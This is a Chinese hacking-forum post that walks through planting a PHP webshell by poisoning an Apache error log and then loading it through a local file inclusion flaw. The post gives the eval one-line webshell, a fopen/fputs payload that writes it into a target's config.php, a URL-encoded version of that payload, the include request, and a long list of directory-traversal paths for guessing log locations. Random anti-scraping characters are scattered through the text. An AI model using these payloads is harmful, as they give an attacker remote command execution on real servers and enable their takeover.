找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2001|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 5 q. O8 |+ d5 V
# c6 M5 O. Q% X/ v, [
比如还是这句一句话木马 & k: p" g' o& k( v1 Z
<?eval($_POST[cmd]);?>   
' Q/ k) M1 P6 N' g' q7 _
6 t* V/ f! X( I; [到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 0 Q2 K. c  }- }
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 8 z# O6 T' ]! l/ T$ n- W+ _& x

1 v0 r7 W" H9 j! X+ W<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
8 c# k, o1 s2 ^fclose($fp);?>   //在config.php里写入一句木马语句 ( t% R9 @% W2 A2 a2 X

$ i$ Q5 L& S  M: D我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 3 {. \6 q8 l. o, u. n, \
转换为
* m/ u! v0 N$ T5 c%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F 7 i0 T6 C& m! |- s) E
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp 3 S6 v4 ^6 k! h/ z) t
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
2 J0 C, Y) m; U! \: r$ gfclose%28%24fp%29%3B%3F%3E
" U; k: w4 `# ^) F+ ^: b8 ?; `; K我们提交
, S: l9 }/ Y6 c9 W3 n, o( fhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww & u3 F; l0 E0 }5 F1 T0 B
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
1 x5 j6 T9 K# p/ }3 U%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B $ I; B/ \- v1 Q. G* `$ a1 L+ L
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
. d! z; ^1 [- M, C, q! Z4 y* j' S! Y
这样就错误日志里就记录下了这行写入webshell的代码。
. A. k6 [$ q4 o4 `# r- Q我们再来包含日志,提交
5 F3 H$ c  y& U0 o) j8 xhttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
4 K: Z0 E/ y: [3 Q/ q/ X+ o! J4 i. i# L
这样webshell就写入成功了,config.php里就写入一句木马语句
! I/ K2 s  g/ n) Z: a' G2 g1 OOK.
- e. m  |) q) @http://www.xxx.com/forum/config.php这个就成了我们的webshell
$ v2 X! m" b' K) s直接用lanker的客户端一连,主机就是你的了。
  I, ]9 m0 Q  z1 v6 [, t, j
5 v1 E! ]; }2 H) wPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 ! q$ C4 m6 E. [( m: g' E1 g  e
) c/ L7 R: X' Q' G( @$ G6 c+ j
其他的日志路径,你可以去猜,也可以参照这里。 ) r7 i6 U  T) x, ^. |- u
../../../../../../../../../../var/log/httpd/access_log 9 Y$ K2 G  w8 ?2 d
../../../../../../../../../../var/log/httpd/error_log
- e, r! g; N4 m' @../apache/logs/error.log
6 j8 J2 O" h& x../apache/logs/access.log
, D# ], \* z# Z# i3 w7 w; h../../apache/logs/error.log
; \2 o( B5 Z) x../../apache/logs/access.log
& U9 }0 T  S* ]1 T, s../../../apache/logs/error.log 1 E- g# t; ?- U5 D$ Y# [& `" D
../../../apache/logs/access.log / d3 s3 w% s) F
../../../../../../../../../../etc/httpd/logs/acces_log ) d- B2 J  Z6 S7 E4 Z+ K  ~6 V
../../../../../../../../../../etc/httpd/logs/acces.log ! N. E, M! @2 _, X! \
../../../../../../../../../../etc/httpd/logs/error_log
- v3 }- F3 Z6 h6 p! v. u../../../../../../../../../../etc/httpd/logs/error.log 3 |6 ~8 {7 Q; ^) J6 b
../../../../../../../../../../var/www/logs/access_log
9 t8 R! ^/ `# [../../../../../../../../../../var/www/logs/access.log
6 i8 |- R8 d0 n/ O../../../../../../../../../../usr/local/apache/logs/access_log 8 l5 o2 R  m. e0 y/ d' n; @! H; B1 ?
../../../../../../../../../../usr/local/apache/logs/access.log
$ ~  F: i# t% J: f" q../../../../../../../../../../var/log/apache/access_log 7 ]( z* G! O( f$ h! V0 i" W
../../../../../../../../../../var/log/apache/access.log / W/ v: e! w; H4 i' `, ?1 c
../../../../../../../../../../var/log/access_log
2 ~. Q) G: C% s6 e../../../../../../../../../../var/www/logs/error_log
) Q7 W. d4 d* v  {../../../../../../../../../../var/www/logs/error.log
4 ~8 d  x! J" ]( ~5 s3 B, Z../../../../../../../../../../usr/local/apache/logs/error_log 7 Q( t3 j: I. b0 J* M
../../../../../../../../../../usr/local/apache/logs/error.log
' c" c& J- }# j7 i../../../../../../../../../../var/log/apache/error_log 3 W& b& h% `5 h- y+ p2 H% ]3 g
../../../../../../../../../../var/log/apache/error.log
* k0 e) a: @/ H$ j; \2 T+ W../../../../../../../../../../var/log/access_log $ M/ \3 i* ~" }$ h+ G2 r7 H- n
../../../../../../../../../../var/log/error_log * @! ?4 y( R6 o2 ~# f8 t
/var/log/httpd/access_log      
  s& x1 e1 |; X1 T' t1 a' O2 N/var/log/httpd/error_log     
9 e# {! ?/ f, v) I1 U6 M( O/ l) V; g../apache/logs/error.log     
+ z  n) x* \3 B! h4 }" G+ N../apache/logs/access.log
2 w% d& C6 e- s../../apache/logs/error.log * s  b( j" j7 F
../../apache/logs/access.log   s1 t' I( U6 B9 ?+ U! Y
../../../apache/logs/error.log 7 u4 n) k9 g# [* V! I' X/ ?
../../../apache/logs/access.log
# b. ^0 |, S. ]  p5 Z+ c/etc/httpd/logs/acces_log ; u0 ?, A! a2 m$ F! Q6 m* x
/etc/httpd/logs/acces.log ! W, B& k( P7 M3 C1 ~
/etc/httpd/logs/error_log & [' p8 C9 j7 o+ t" `$ z! Q: n
/etc/httpd/logs/error.log # G1 H) f( H- ?. A/ B1 g1 R- M
/var/www/logs/access_log / s1 l& n4 I0 ?  T0 }
/var/www/logs/access.log 5 _; n5 x9 \. Q) j* Y: k/ f
/usr/local/apache/logs/access_log
# g9 C, ~: l/ d) }/usr/local/apache/logs/access.log ) x/ w0 ?0 ]4 }, z( J8 `
/var/log/apache/access_log
+ a' u/ p. _# B; S% t1 U/var/log/apache/access.log , G" [7 r; R( p- C. |
/var/log/access_log
6 T1 [- o. f: L7 P$ W1 Y" B/var/www/logs/error_log
$ _. F3 T# Z  \2 j, u/var/www/logs/error.log
. H# @# o" [( H3 r/usr/local/apache/logs/error_log $ u7 s1 E. N( U" c
/usr/local/apache/logs/error.log
. }5 X4 f! R: t) }$ E/ A0 g+ k/var/log/apache/error_log ! I+ _. a# D0 K% q, Y
/var/log/apache/error.log / ?( @6 N5 y6 W9 P) E! x$ d; |! f
/var/log/access_log 2 _1 ?& w( G1 @" a
/var/log/error_log
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表